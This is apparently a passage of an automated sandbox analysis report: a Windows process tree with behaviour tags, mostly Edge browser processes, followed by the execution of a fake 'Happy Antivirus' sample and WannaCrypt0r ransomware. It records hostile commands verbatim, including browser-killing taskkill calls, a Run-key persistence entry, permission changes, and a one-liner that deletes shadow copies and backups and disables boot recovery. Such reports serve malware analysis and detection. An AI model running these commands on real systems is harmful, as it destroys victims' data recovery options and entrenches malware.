                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1976 /prefetch:1
                                                                                        2⤵
                                                                                          PID:4772
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6404 /prefetch:8
                                                                                          2⤵
                                                                                          • NTFS ADS
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:1404
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:1
                                                                                          2⤵
                                                                                            PID:1004
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:8
                                                                                            2⤵
                                                                                            • NTFS ADS
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:3692
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
                                                                                            2⤵
                                                                                              PID:4188
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6580 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4548
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:3880
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6836 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:2140
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:4816
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6248 /prefetch:8
                                                                                                      2⤵
                                                                                                      • NTFS ADS
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:2784
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:1096
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6248 /prefetch:8
                                                                                                        2⤵
                                                                                                        • NTFS ADS
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:2032
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3408 /prefetch:8
                                                                                                        2⤵
                                                                                                        • NTFS ADS
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:3964
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:2932
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6828 /prefetch:8
                                                                                                          2⤵
                                                                                                          • NTFS ADS
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:5068
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:752
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 /prefetch:8
                                                                                                            2⤵
                                                                                                            • NTFS ADS
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:2424
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:4992
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:2424
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3696 /prefetch:8
                                                                                                                2⤵
                                                                                                                • NTFS ADS
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:3860
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:3336
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:4288
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • NTFS ADS
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:4548
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:3948
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3280 /prefetch:8
                                                                                                                      2⤵
                                                                                                                      • NTFS ADS
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:1288
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
                                                                                                                      2⤵
                                                                                                                        PID:2100
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,7738494989542447246,1135511473747702311,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6840 /prefetch:8
                                                                                                                        2⤵
                                                                                                                        • NTFS ADS
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:5016
                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:2896
                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:2148
                                                                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                                                                          C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004E0
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2248
                                                                                                                        • C:\Windows\System32\rundll32.exe
                                                                                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:4460
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_Happy Antivirus.zip\[email protected]
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Temp1_Happy Antivirus.zip\[email protected]"
                                                                                                                            1⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                            PID:4844
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im explorer.exe
                                                                                                                              2⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3712
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im sidebar.exe
                                                                                                                              2⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:1680
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                              2⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:1380
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im firefox.exe
                                                                                                                              2⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:1620
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im iexplore.exe
                                                                                                                              2⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3340
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im opera.exe
                                                                                                                              2⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3700
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im safari.exe
                                                                                                                              2⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:1288
                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                              C:\Windows\explorer.exe
                                                                                                                              2⤵
                                                                                                                                PID:2832
                                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                                              C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:3620
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
                                                                                                                                1⤵
                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:5056
                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:3356
                                                                                                                                • C:\Windows\System32\rundll32.exe
                                                                                                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:4976
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    • Modifies registry class
                                                                                                                                    • NTFS ADS
                                                                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:2004
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\[email protected]
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\[email protected]"
                                                                                                                                      2⤵
                                                                                                                                      • Drops startup file
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Sets desktop wallpaper using registry
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:988
                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                        attrib +h .
                                                                                                                                        3⤵
                                                                                                                                        • Views/modifies file attributes
                                                                                                                                        PID:2860
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls . /grant Everyone:F /T /C /Q
                                                                                                                                        3⤵
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:3000
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskdl.exe
                                                                                                                                        taskdl.exe
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:4024
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c 250951723716325.bat
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:888
                                                                                                                                        • C:\Windows\SysWOW64\cscript.exe
                                                                                                                                          cscript.exe //nologo m.vbs
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:1348
                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                        attrib +h +s F:\$RECYCLE
                                                                                                                                        3⤵
                                                                                                                                        • Views/modifies file attributes
                                                                                                                                        PID:1476
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:2648
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\TaskData\Tor\taskhsvc.exe
                                                                                                                                          TaskData\Tor\taskhsvc.exe
                                                                                                                                          4⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:2028
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd.exe /c start /b @[email protected] vs
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:3924
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                          4⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:3992
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                                                            5⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:3700
                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                              wmic shadowcopy delete
                                                                                                                                              6⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4804
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskdl.exe
                                                                                                                                        taskdl.exe
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:1072
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskse.exe
                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:4228
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Sets desktop wallpaper using registry
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:1328
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "xlpabxbmfhyivu622" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\tasksche.exe\"" /f
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:3932
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "xlpabxbmfhyivu622" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\tasksche.exe\"" /f
                                                                                                                                          4⤵
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Modifies registry key
                                                                                                                                          PID:3096
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskdl.exe
                                                                                                                                        taskdl.exe
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:4412
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskse.exe
                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:1780
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:4752
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskse.exe
                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:1808
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:4924
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskdl.exe
                                                                                                                                        taskdl.exe
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:3960
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskse.exe
                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:1756
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:2352
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskdl.exe
                                                                                                                                        taskdl.exe
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:4772
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskse.exe
                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:3376
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:5068
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskdl.exe
                                                                                                                                        taskdl.exe
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:2016
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskse.exe
                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:716
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskdl.exe
                                                                                                                                        taskdl.exe
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:4068
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\taskse.exe
                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r (1).zip\@[email protected]
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:3428
